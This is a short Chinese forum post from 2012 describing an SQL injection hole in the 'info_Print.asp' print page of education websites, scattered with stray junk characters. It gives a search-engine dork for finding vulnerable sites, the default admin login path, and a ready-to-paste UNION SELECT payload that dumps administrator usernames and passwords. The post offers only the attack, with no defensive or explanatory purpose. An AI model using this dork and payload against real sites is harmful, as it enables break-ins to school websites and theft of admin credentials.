教育站打印页面漏洞
' o; d9 ?4 ]9 p2 H; m百度或google搜索 inurl:info_Print.asp?ArticleID=0 Q0 K1 w+ n* e: t; K( Q& _- [& [
默认后台:/ad_login.asp
5 ~/ S1 T# `1 k, u爆管理员密码:
6 }' f0 c$ \6 t4 G$ Z& ~' _在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
& |$ u, O8 K* w9 k+ A" ^% O* [8 L7 D- d1 a+ u" A8 H) g0 z& F" W
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
0 T. G) ~3 s& v
1 ~3 y5 R4 n" m1 X作者:佚名
& C( p3 ~! m; Y/ ^" v % I( ^9 q6 }1 K4 [: p! m" z7 P9 W
0 y: O) O* _3 W8 K, e |
发表于 2012-10-31 08:37:31
收藏
支持
反对